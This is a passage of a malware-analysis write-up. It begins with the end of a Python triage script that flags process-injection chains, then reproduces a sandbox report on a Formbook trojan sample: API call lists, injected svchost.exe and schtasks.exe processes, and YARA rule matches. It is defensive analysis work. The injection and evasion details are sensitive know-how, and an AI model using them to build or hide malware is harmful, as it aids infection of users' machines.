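        flag = "INJECTION CHAIN" if info["injector"] else "-"
        print(f"{flag:15} {path}: stages={info['stages']} native={info['native_apis']}")
```

Run it as a script to print one line per process; on the sample, only schtasks.exe covers all three stages, while svchost.exe (NtOpenThread only) and the original dropper do not. Feed the full report listing into `triage()` to get the same view for every process in the analysis. The parser deliberately keeps LdrInitializeThunk in the API set, since Nt* stubs paired with it at addresses outside the main image are what the report's "direct / indirect syscall" signature is based on.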
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_00434D50: GetFullPathNameW, __swprintf, _wcslen, _wcslen, _wcslen, CreateDirectoryW, CreateFileW, _memset, _wcslen, _wcsncpy, DeviceIoControl, CloseHandle, RemoveDirectoryW, CloseHandle
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_004461ED: _memset, DuplicateTokenEx, CloseHandle, OpenWindowStationW, GetProcessWindowStation, SetProcessWindowStation, OpenDesktopW, _wcslen, _wcsncpy, LoadUserProfileW, CreateEnvironmentBlock, CreateProcessAsUserW, UnloadUserProfile, CloseWindowStation, CloseDesktop, SetProcessWindowStation, CloseHandle, DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_004364AA: GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, GetLastError, ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState, SetSystemPowerState
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_00412038
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_00427161
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_0047E1FA
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_004212BE
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_00443390
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_00443391
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_0041A46B
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_0041240C
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_00446566
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_004045E0
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_0041D750
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_004037E0
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_00427859
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_00412818
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_0040F890
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_0042397B
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_00409A40
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_00411B63
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_0047CBF0
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_0044EBBC
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_00412C38
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_00490D70
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_0044ED9A
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_00423EBF
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_00424F70
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_0041AF0D
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: 0_2_03F95640
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418013
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040F8C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040F8C7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040F8BA
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004161FE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401190
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00416203
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040FAE3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040DB63
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004013E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004023B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00402C20
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042E4E3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040DCA7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401F30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004027B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C003E6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BC02C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BF41A2
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C001AA
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BF81CC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B30100
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B64750
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B5C6E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C00591
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BEE4F6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BE4420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BF2446
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BF6BD7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFAB40
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C0A9A6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B268B8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6E8F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B4A840
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B42840
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BBEFA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B4CFE0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B32FC8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B60F30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BE2F30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B82F28
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB4F40
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B52E90
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFCE93
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFEEDB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFEE26
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B40E59
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B58DBF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3ADE0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BDCD1F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B4AD00
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BE0CB5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B30CF2
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B40C00
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B8739A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BF132D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B2D34C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B452A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B5B2C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B4B1B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C0B16B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B7516C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BF70E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFF0E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BEF0CC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFF7B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BF16CC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B85630
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C095C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BDD5B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BF7571
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFF43F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B31460
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B5FB80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB5BF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B7DBF9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFFB76
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BDDAAC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B85AA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BE1AA3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BEDAC6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB3A6C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFFA49
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BF7A46
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BD5910
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B49950
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B5B950
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B438E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BAD800
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFFFB1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B41F92
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B03FD2
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B03FD5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFFF09
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B49EB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B5FDC0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BF7D73
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BF1D5A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B43D40
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFFCF2
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB9C32
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F702C0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F90274
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FB03E6
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EFE3F0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FAA352
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F82000
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FA81CC
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FB01AA
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FA41A2
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F78158
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F8A118
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EE0100
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F0C6E0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EEC7C0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EF0770
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F14750
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F9E4F6
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FA2446
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F94420
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FB0591
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EF0535
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EEEA80
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FA6BD7
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FAAB40
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F1E8F0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02ED68B8
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EF2840
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EFA840
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EF29A0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FBA9A6
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F06962
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FAEEDB
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F02E90
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FACE93
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EF0E59
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FAEE26
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EFCFE0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EE2FC8
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F6EFA0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F64F40
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F10F30
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F92F30
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F32F28
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EE0CF2
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F90CB5
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EF0C00
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EEADE0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F08DBF
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F8CD1F
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EFAD00
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F912ED
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F0B2C0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EF52A0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F3739A
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EDD34C
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FA132D
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FA70E9
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FAF0E0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EF70C0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F9F0CC
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EFB1B0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FBB16B
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F2516C
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EDF172
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FA16CC
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F35630
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FAF7B0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EE1460
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FAF43F
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FB95C3
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F8D5B0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FA7571
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F9DAC6
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F35AA0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F8DAAC
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F91AA3
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F63A6C
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FAFA49
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FA7A46
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F65BF0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F2DBF9
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F0FB80
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FAFB76
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EF38E0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F5D800
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F0B950
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EF9950
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F85910
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EF9EB0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EB3FD2
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EB3FD5
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FAFFB1
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EF1F92
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FAFF09
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FAFCF2
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F69C32
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02F0FDC0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FA7D73
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02FA1D5A
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02EF3D40
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_00451AD0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_0044CA17
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_0044CA24
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_0044CA20
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_0044CC40
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_0044ACC0
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_0044AE04
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_00455170
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_0045335B
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_00453360
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_0046B640
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02B5E295
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02B5E3B3
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02B5D7B8
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02B5E74C
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: 4_2_02B5CA63
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03BBF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03BAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B2B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03B87E54 appears 111 times
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: String function: 00445975 appears 65 times
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: String function: 0041171A appears 37 times
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: String function: 0041718C appears 45 times
            Source: C:\Users\user\Desktop\Doc 784-01965670.exe Code function: String function: 0040E6D0 appears 35 times
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: String function: 02F37E54 appears 111 times
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: String function: 02EDB970 appears 280 times
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: String function: 02F6F290 appears 105 times
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: String function: 02F25130 appears 58 times
            Source: C:\Windows\SysWOW64\schtasks.exe Code function: String function: 02F5EA12 appears 86 times
            Source: Doc 784-01965670.exe, 00000000.00000003.2052253285.00000000048ED000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Doc 784-01965670.exe
            Source: Doc 784-01965670.exe, 00000000.00000003.2052600590.0000000004743000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Doc 784-01965670.exe
            Source: Doc 784-01965670.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2220515840.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4509758397.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4508251164.0000000000440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4508587001.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4511141181.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2220815551.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2221191157.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4509677261.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@17/11
